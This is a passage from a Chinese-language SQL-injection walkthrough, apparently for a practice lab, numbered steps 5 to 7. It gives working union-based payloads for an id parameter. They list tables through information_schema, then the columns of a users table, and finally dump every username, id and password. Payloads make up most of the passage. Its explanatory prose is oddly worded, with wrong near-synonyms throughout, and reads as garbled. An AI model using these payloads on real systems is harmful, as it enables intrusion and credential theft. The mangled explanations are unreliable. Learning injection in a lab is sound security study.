5.爆表,information_schema.tables表现该数据库下的tables表,点表现下一级。where背面是条件,group_concat()是将查询到效果连接起来。
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
6. 然后,爆完table,接着爆column
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
7.末了,通过上述操作可以得到三个敏感字段就是username和password和id,接下来我们就要得到该字段对应的内容。
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+